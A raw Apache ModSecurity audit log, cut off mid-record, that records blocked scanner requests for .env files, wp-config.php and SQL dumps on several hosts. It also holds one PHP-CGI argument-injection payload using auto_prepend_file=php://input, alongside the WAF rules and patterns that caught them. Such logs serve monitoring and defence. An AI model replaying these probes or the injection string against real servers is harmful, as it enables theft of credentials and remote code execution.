ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744628744833849 885 (- - -) Stopwatch2: 1744628744833849 885; combined=327, p1=291, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00eb3d51-Z-- --6f753d54-A-- [14/Apr/2025:18:06:00 +0700] Z_zsGNPxEtam20ggC7hEIQAAAIw 103.236.140.4 34980 103.236.140.4 8181 --6f753d54-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 128.199.182.55 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 128.199.182.55 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --6f753d54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f753d54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744628760452923 914 (- - -) Stopwatch2: 1744628760452923 914; combined=442, p1=404, p2=0, p3=0, p4=0, p5=37, sr=169, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f753d54-Z-- --caa2db6a-A-- [14/Apr/2025:18:18:40 +0700] Z_zvENPxEtam20ggC7hEMQAAAJI 103.236.140.4 35050 103.236.140.4 8181 --caa2db6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.214.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.214.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --caa2db6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caa2db6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744629520643866 826 (- - -) Stopwatch2: 1744629520643866 826; combined=334, p1=298, p2=0, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caa2db6a-Z-- --64222a5d-A-- [14/Apr/2025:18:28:24 +0700] Z_zxWNPxEtam20ggC7hFEwAAAJU 103.236.140.4 36212 103.236.140.4 8181 --64222a5d-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.233.57 Accept-Encoding: gzip X-Varnish: 126481787 --64222a5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --64222a5d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630104116315 693 (- - -) Stopwatch2: 1744630104116315 693; combined=248, p1=221, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64222a5d-Z-- --5562a71d-A-- [14/Apr/2025:18:28:24 +0700] Z_zxWNga3eJwvi_gLpI9WAAAAFM 103.236.140.4 36216 103.236.140.4 8181 --5562a71d-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.233.57 Accept-Encoding: gzip X-Varnish: 126694405 --5562a71d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5562a71d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630104167486 824 (- - -) Stopwatch2: 1744630104167486 824; combined=340, p1=309, p2=0, p3=0, p4=0, p5=31, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5562a71d-Z-- --120f3464-A-- [14/Apr/2025:18:32:23 +0700] Z_zyR4gxSXM4jtK9zHGL3gAAAMk 103.236.140.4 37888 103.236.140.4 8181 --120f3464-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --120f3464-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --120f3464-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630343680505 699 (- - -) Stopwatch2: 1744630343680505 699; combined=295, p1=258, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --120f3464-Z-- --36090c6e-A-- [14/Apr/2025:18:32:24 +0700] Z_zySFpzfFgMsbYwm2Kf1wAAABE 103.236.140.4 37898 103.236.140.4 8181 --36090c6e-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --36090c6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36090c6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630344367803 744 (- - -) Stopwatch2: 1744630344367803 744; combined=314, p1=257, p2=0, p3=0, p4=0, p5=57, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36090c6e-Z-- --b74c8c65-A-- [14/Apr/2025:18:32:24 +0700] Z_zySIgxSXM4jtK9zHGL4QAAAM8 103.236.140.4 37900 103.236.140.4 8181 --b74c8c65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b74c8c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b74c8c65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630344411841 736 (- - -) Stopwatch2: 1744630344411841 736; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b74c8c65-Z-- --db71b261-A-- [14/Apr/2025:18:32:25 +0700] Z_zySVpzfFgMsbYwm2Kf2AAAABI 103.236.140.4 37906 103.236.140.4 8181 --db71b261-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --db71b261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db71b261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630345063465 631 (- - -) Stopwatch2: 1744630345063465 631; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db71b261-Z-- --260cb90f-A-- [14/Apr/2025:18:32:25 +0700] Z_zySVpzfFgMsbYwm2Kf2QAAABU 103.236.140.4 37908 103.236.140.4 8181 --260cb90f-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --260cb90f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --260cb90f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630345112028 634 (- - -) Stopwatch2: 1744630345112028 634; combined=264, p1=236, p2=0, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --260cb90f-Z-- --baadc319-A-- [14/Apr/2025:18:43:10 +0700] Z_z0ztga3eJwvi_gLpI-rgAAAEc 103.236.140.4 40472 103.236.140.4 8181 --baadc319-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.233.57 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --baadc319-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baadc319-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630990201756 760 (- - -) Stopwatch2: 1744630990201756 760; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baadc319-Z-- --c2850d6c-A-- [14/Apr/2025:18:43:10 +0700] Z_z0ztga3eJwvi_gLpI-rwAAAEU 103.236.140.4 40474 103.236.140.4 8181 --c2850d6c-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.233.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c2850d6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2850d6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630990222587 760 (- - -) Stopwatch2: 1744630990222587 760; combined=347, p1=313, p2=0, p3=0, p4=0, p5=34, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2850d6c-Z-- --c056e134-A-- [14/Apr/2025:20:35:10 +0700] Z_0PDlpzfFgMsbYwm2KgrgAAAA0 103.236.140.4 43342 103.236.140.4 8181 --c056e134-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.172.232.142 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c056e134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c056e134-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744637710376740 668 (- - -) Stopwatch2: 1744637710376740 668; combined=256, p1=220, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c056e134-Z-- --56a28560-A-- [14/Apr/2025:22:15:12 +0700] Z_0mgNPxEtam20ggC7hGfwAAAIE 103.236.140.4 44126 103.236.140.4 8181 --56a28560-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 Accept-Charset: utf-8 --56a28560-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56a28560-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744643712142497 818 (- - -) Stopwatch2: 1744643712142497 818; combined=340, p1=304, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56a28560-Z-- --228d2c48-A-- [14/Apr/2025:22:18:44 +0700] Z_0nVIgxSXM4jtK9zHGOYQAAANE 103.236.140.4 44168 103.236.140.4 8181 --228d2c48-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --228d2c48-C-- --228d2c48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --228d2c48-E-- --228d2c48-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744643924381445 5265 (- - -) Stopwatch2: 1744643924381445 5265; combined=3192, p1=512, p2=2638, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --228d2c48-Z-- --18b3af0d-A-- [14/Apr/2025:22:48:50 +0700] Z_0uYlpzfFgMsbYwm2KhMAAAABU 103.236.140.4 44476 103.236.140.4 8181 --18b3af0d-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 143.110.213.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 143.110.213.72 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --18b3af0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18b3af0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744645730897197 847 (- - -) Stopwatch2: 1744645730897197 847; combined=317, p1=288, p2=0, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18b3af0d-Z-- --85e43a7e-A-- [14/Apr/2025:22:59:56 +0700] Z_0w_NPxEtam20ggC7hGkQAAAIs 103.236.140.4 44548 103.236.140.4 8181 --85e43a7e-B-- GET /bd.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 2.58.56.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 2.58.56.43 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --85e43a7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85e43a7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646396617198 2686 (- - -) Stopwatch2: 1744646396617198 2686; combined=952, p1=423, p2=499, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85e43a7e-Z-- --10b28f2c-A-- [14/Apr/2025:22:59:58 +0700] Z_0w_tPxEtam20ggC7hGkgAAAI4 103.236.140.4 44550 103.236.140.4 8181 --10b28f2c-B-- GET /newbase.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.141.215.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.141.215.21 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --10b28f2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10b28f2c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646398281940 3071 (- - -) Stopwatch2: 1744646398281940 3071; combined=1118, p1=586, p2=501, p3=0, p4=0, p5=31, sr=183, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10b28f2c-Z-- --eb737304-A-- [14/Apr/2025:22:59:59 +0700] Z_0w_9PxEtam20ggC7hGkwAAAIo 103.236.140.4 44552 103.236.140.4 8181 --eb737304-B-- GET /installer.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --eb737304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb737304-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646399133193 2414 (- - -) Stopwatch2: 1744646399133193 2414; combined=858, p1=450, p2=379, p3=0, p4=0, p5=29, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb737304-Z-- --0abf6f5a-A-- [14/Apr/2025:23:00:00 +0700] Z_0xANPxEtam20ggC7hGlAAAAJE 103.236.140.4 44554 103.236.140.4 8181 --0abf6f5a-B-- GET 